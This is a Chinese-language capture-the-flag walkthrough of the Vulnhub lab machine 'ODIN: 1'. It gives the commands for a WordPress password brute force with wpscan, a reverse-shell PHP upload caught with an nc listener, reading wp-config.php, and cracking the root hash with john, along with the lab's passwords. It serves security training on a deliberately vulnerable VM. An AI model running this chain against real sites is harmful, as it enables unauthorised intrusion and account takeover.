一、前言
主要利用方式:wordpress网站的账号密码爆破
拿到账号进入平台文件上传拿到www权限
cd到config文件获取配置信息
使用john破解加密的root账号
二、靶机信息
靶场: vulnhub.com
靶机名称: ODIN: 1
难度: 简单
发布时间: 2020 年 11月 21日
下载地址:https://www.vulnhub.com/entry/odin-1,619/
备注:常规手段:wpscan+john
但听说还有通过web网站解密图片加密信息获取账号密码的方式
三、虚拟机配置
VirtualBox、网络连接模式:NAT模式、DHCP服务:启用、IP地址:自动分配
四、信息收集
1、探测靶机ip地址
└─$ sudo arp-scan -I eth0 -l
2、探测靶机ip端口及端口具体服务
└─$ sudo nmap -p- 10.0.25
└─$ sudo nmap -p22,80 -sV -A 10.0.2.10
3、访问80端口及常规路径扫描
浏览器访问:http://10.0.2.25/ 发现出现html格式错乱,结合路径扫描的信息,推理需要通过绑定host
└─$ dirsearch -u 10.0.2.25
4、绑定hosts后访问
└─$ sudo vi /etc/hosts
5、通过前面的路径扫描,可以发现存在wordpress网站,并且存在后台,尝试发现admin账号存在密码错误,输入其他用户名和任意密码报请确认账号存在问题,
http://odin/wp-login.php
6、推测出存在admin用户,可以通过wpscan进行爆破密码,
└─$ wpscan --url http://odin/wp-login.php --usernames admin --passwords /usr/share/wordlists/rockyou.txt
得出账号密码: | Username: admin, Password: qwerty
五、漏洞利用(突破边界)
7、进入后台,上传文件
依次点击Plugins—Upload Plugin—Browse,选择我们改好的prs.php,然后点击右边的InstallNow。
Prs.php文件的端口和ip分别设置
8、上传后,wordpress并未提示上传的地方,但通过固定目录结构得知上传接口
http://odin/wp-content/uploads/
找到文件上传的具体链接:odin/wp-content/uploads/2022/11/prs.php
9、攻击端设置监听,并访问靶机上传好的prs文件
└─$ nc -lnvp 9999
访问:http://odin/wp-content/uploads/2022/11/prs.php
10、反弹shell成功,查看权限并改交互式tty
提升tty
六、提权
11、进入wp-config.php文件查询root的密码
www-data@osboxes:/$ cd /var/www/html
www-data@osboxes:/var/www/html$ cat wp-config.php
发现root的加密密码
12、把root密码新建文本,然后使用john进行破解
└─$ vi 221108pwd.txt
└─$ cat 221108pwd.txt
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt 221108pwd.txt
获取了root密码:jasmine (root)
13、切换root权限,验证id及ip
www-data@osboxes:/var/www/html$ su root
Password: jasmine
root@osboxes:/var/www/html# id
root@osboxes:/var/www/html# ip a
